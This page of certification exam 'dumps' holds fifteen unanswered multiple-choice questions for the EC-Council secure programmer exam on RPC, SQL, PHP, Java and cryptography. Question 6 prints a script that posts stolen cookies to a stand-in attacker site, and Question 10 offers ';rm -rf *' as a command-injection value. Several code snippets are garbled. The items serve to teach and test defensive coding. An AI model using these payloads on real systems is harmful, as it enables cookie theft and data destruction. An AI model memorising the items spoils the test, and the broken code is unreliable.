Limited Time Discount Offer
30% Off - Ends in 02:00:00

X

ECCouncil 312-92 Dumps

ECCouncil
EC-Council Certified Secure Programmer v2
ECCouncil
EC-Council Certified Secure Programmer v2

Questions & Answers for ECCouncil 312-92

Showing 1-15 of 99 Questions

Question #1

Simon is writing an application that will use RPC to talk between a client and server. He will
use authentication, but in his application the server does not have to know the RPC
callers identity. What type of RPC authentication can Simon use for this application?

A. UNIX authentication

B. ANONYMOUS authentication

C. DES authentication

D. NULL authentication

Question #2

What compression library is used by wiretap, the packet analyzer reader for Wireshark?

A. wtapbil

B. pclib

C. winrar

D. zllib

Question #3

Why would a software development firm want to fix any issues with a program at the design
stage as opposed to fixing issues with a program through a patch release?

A. Releasing a patch costs 25 times as much as fixing the issue in the design stage

B. Releasing a patch costs 5 times as much as fixing the issue in the design stage

C. Releasing a patch is actually the most efficient and cost effective way of solving issues

D. Releasing a patch costs 60 times as much as fixing the issue in the design stage

Question #4

What vulnerability is the following code susceptible to?
CREATE OR REPLACE PROCEDURE demo (name in VARCHAR2) as
cursor_name INTEGER;
rows_processed INTEGER;
sql VARCHAR2(150);
code VARCHAR2(2);
BEGIN
...
sql := 'SELECT postal_code FROM states WHERE state_name = '''
|| '''';
cursor_name := dbms_sql.open_cursor;
DBMS_SQL.PARSE(cursor_name, sql, DBMS_SQL.NATIVE);
DBMS_SQL.DEFINE_COLUMN(cursor_name, 1, code, 10);
row_processed:= DMBS_SQL.EXECUTIVE(cursor_name);
DBMS_SQL.CLOSE_CURSOR(cursor_name);

A. SQL string manipulation

B. DBMS_Open string attacks

C. Oracle injection

D. SQL injection

Question #5

In the following socket programming code, who will the server allow connections from?
int main(void)
int s1, s2;
s1 = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_port = htons(30);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = 0;
bind(sockfd, (struct sockaddr *)&sin, sizeof(sin));
listen(sockfd, 10);
s2 = accept(sockfd, 10);
write(s2, "hello\n", 6)

A. Only those coming in on TCP port 10

B. Only those on the same subnet as the server

C. Only those coming in on UDP port 10

D. Anyone

Question #6

Gerald is a web security consultant for Protectors International. Gerald's main responsibility
is to search the Internet for malicious and deceitful sites that the public should be aware of.
Gerald was tipped off about a particular site and is now looking over its source code in a
protected environment. Gerald finds the following snippet particularly interesting. What has
Gerald stumbled upon?
<script>
document.write('<form name=hack method=post action="http://
scarysite.com/getit.php">
<input type=hidden name=sid value="' + escape(document.cookie) +
'">');
document.hack.submit();
</script>

A. Hidden post command

B. Hidden form fields

C. JavaScript hijacking

D. XSS attack

Question #7

Paul wants to capture audit information on PLSQL so he executes the following command:
sqlplus sys / as sysdba
Enter password: password123!!!!
SQL> ALTER SYSTEM SET AUDIT_TRAIL = OS
SCOPE=SPFILE;
SQL> SHUTDOWN NORMAL;
SQL> STARTUP;
What privileges has Paul logged on with?

A. ADMIN

B. Root

C. SYSDBA

D. SYS

Question #8

What would be the output of the following script?
import java.net*;
public class ExampleByName {
public static void main(String[] args) {
try
InetAddress.getByName(www.microsoft.com");
System.out.println(address);
catch (UnKnownHostException e) {
System.out.println("Could not find www.microsoft.com")

A. IP address of www.microsoft.com

B. Hexadecimal equivalent for www.microsoft.com

C. Tracert information to the www.microsoft.com

D. Whois information for www.microsoft.com

Question #9

Harold is creating an Oracle Label Security Policy on his server. He has define the policy
and defined the components of the labels already. Now Harold creates the labels
dynamically using the TO_DATA_LABEL function:
INSERT INTO emp (ename, empnum, hr_label)
VALUES ('FGRIFFIN', 10 to_data_label ('HR', 'SENSITIVE'));
Harold gets an error reffering to permission when he tries to run this function. What
authority must Harold have to run the TO_DATA_LABEL function?

A. EXECUTE

B. WRITE

C. INSERT

D. CREATE

Question #10

William, a software developer just starting his career, was asked to create a website in
PHP that would allow visitors to enter a month and a year for their birth date. The PHP
code he creates has to validate the input after it is entered. If William uses the following
code, what could a malicious user input to the year value to actually delete the whole
website?
$month = $_GET['month'];
$year = $_GET['year'];
exec("cal $month $year", $result);
print "<PRE>";
foreach($result as $r)
print "$r<BR>";
print "</PRE>";

A. ";gf -rm *"

B. ";dfr -php *"

C. ";php -rf *"

D. ";rm -rf *"

Question #11

George is writing an application in Java and is using DES in the code to implement the
encryption and decryption of data that will be passed. In the following code snippet, what
will be accomplished?
FileOutputStream out = newFileOutputStream
(f);
out.write(rawkey);

A. Convert the secret key to an array of bytes

B. Generate a secret TripleDES encryption key

C. Writes the raw key to a file

D. Send the raw key to a decryption output array

Question #12

What testing methodology does not require any knowledge of the internal design or code of
a software application?

A. Integration testing

B. White box testing

C. Black box testing

D. Unit testing

Question #13

Mathew is working on a Fedora machine and is having issues with some shellcode he
wrote that is producing errors. Mathew decides to download and use Ktrace to debug the
shellcode to see where the errors are originating from. Why will his plan not work?

A. Ktrace cannot debug errors, it only notifies of successful calls

B. Ktrace only works on Windows platforms

C. Ktrace cannot debug shellcode

D. Ktrace only works on *BSD platforms

Question #14

Shayla is designing a web-based application that will pass data to and from a company
extranet. This data is very sensitive and must be protected at all costs. Shayla will use a
digital certificate and a digital signature to protect the data. The digital signature she has
chosen to use is based on the difficulty in computing discrete logarithms. Which digital
signature has she chosen?

A. Rabin

B. Diffie-Hellman

C. SA-PSS

D. ElGamal

Question #15

Julie wants to use some of the Security and Trust Services API's for a program she is
writing that will work with mobile devices. Which SATSA security package should Julie use
if she needs to support basic user-certificate management?

A. javax.crypto.pki

B. javax.microedition.crypto

C. javax.microedition.pki

D. javax.security.crypto

×